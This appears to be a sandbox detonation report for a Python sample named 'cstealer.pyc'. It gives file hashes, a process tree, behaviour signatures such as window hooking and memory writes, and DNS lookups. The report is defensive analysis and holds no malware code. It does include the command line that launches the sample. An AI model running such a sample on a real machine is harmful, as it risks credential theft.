C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Util\_strxor.pyd

MD5 fae081b2c91072288c1c8bf66ad1aba5
SHA1 cd23ddb83057d5b056ca2b3ab49c8a51538247de
SHA256 af76a5b10678f477069add6e0428e48461fb634d9f35fb518f9f6a10415e12d6
SHA512 0adb0b1088cb6c8f089cb9bf7aec9eeeb1717cf6cf44b61fb0b053761fa70201ab3f7a6461aaae1bc438d689e4f8b33375d31b78f1972aa5a4bf86afad66d3a4

C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_cbc.pyd

MD5 0c46d7b7cd00b3d474417de5d6229c41
SHA1 825bdb1ea8bbfe7de69487b76abb36196b5fdac0
SHA256 9d0a5c9813ad6ba129cafef815741636336eb9426ac4204de7bc0471f7b006e1
SHA512 d81b17b100a052899d1fd4f8cea1b1919f907daa52f1bad8dc8e3f5afc230a5bca465bbac2e45960e7f8072e51fdd86c00416d06cf2a1f07db5ad8a4e3930864

C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Cipher\_raw_ecb.pyd

MD5 dedae3efda452bab95f69cae7aebb409
SHA1 520f3d02693d7013ea60d51a605212efed9ca46b
SHA256 6248fdf98f949d87d52232ddf61fada5ef02cd3e404bb222d7541a84a3b07b8a
SHA512 8c1cab8f34de2623a42f0750f182b6b9a7e2affa2667912b3660af620c7d9ad3bd5b46867b3c2d50c0cae2a1bc03d03e20e4020b7ba0f313b6a599726f022c6c

C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_SHA1.pyd

MD5 9d15862569e033c5aa702f9e4041c928
SHA1 11376e8cb76ad2d9a7d48d11f4a74fb12b78bcf6
SHA256 8970df77d2f73350360dbe68f937e0523689ff3d7c0be95eb7ca5820701f1493
SHA512 322f0f4947c9d5d2800deebfd198eabe730d44209c1b61bb9fd0f7f9ed5f719ae49f8397f7920bdb368bb386a598e9b215502dc46fbe72f9340876cf40affc8a

C:\Users\Admin\AppData\Local\Temp\_MEI43202\Crypto\Hash\_BLAKE2s.pyd

MD5 06d3e941860bb0abedf1baf1385d9445
SHA1 e8c16c3e8956ba99a2d0de860dcfc5021f1d7de5
SHA256 1c340d2625dad4f07b88bb04a81d5002aabf429561c92399b0eb8f6a72432325
SHA512 6f62acff39b77c1ec9f161a9bfa94f8e3b932d56e63daee0093c041543993b13422e12e29c8231d88bc85c0573ad9077c56aa7f7a307e27f269da17fba8ee5a3

C:\Users\Admin\AppData\Local\Tempcstzmbjujy.db

MD5 1ac9296bf54211fc69a717d265d08da7
SHA1 84aa58b01e344562626c039a6befe45aa50480a4
SHA256 2663aa18fa523dd88df4d099e859c78e8f488ed3ab2037156a0218d9d00ec46b
SHA512 9df862aca72a3f706c1fefd02fbca3f6f5b4e2b2c27fe336a5a60e86cbc81b4ab5edce0e618d766d08ed335a84f7b8617bf94fef48f6737f3b04f5a612e11a3b

C:\Users\Admin\AppData\Local\Tempcsghutsbrz.db

MD5 87210e9e528a4ddb09c6b671937c79c6
SHA1 3c75314714619f5b55e25769e0985d497f0062f2
SHA256 eeb23424586eb7bc62b51b19f1719c6571b71b167f4d63f25984b7f5c5436db1
SHA512 f8cb8098dc8d478854cddddeac3396bc7b602c4d0449491ecacea7b9106672f36b55b377c724dc6881bee407c6b6c5c3352495ed4b852dd578aa3643a43e37c0

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-12 18:14

Reported

2024-11-12 18:31

Platform

win10ltsc2021-20241023-en

Max time kernel

582s

Max time network

442s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4324 wrote to memory of 2124 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE
PID 4324 wrote to memory of 2124 N/A C:\Windows\system32\OpenWith.exe C:\Windows\system32\NOTEPAD.EXE

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\cstealer.pyc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
IE 20.223.35.26:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp

Files

N/A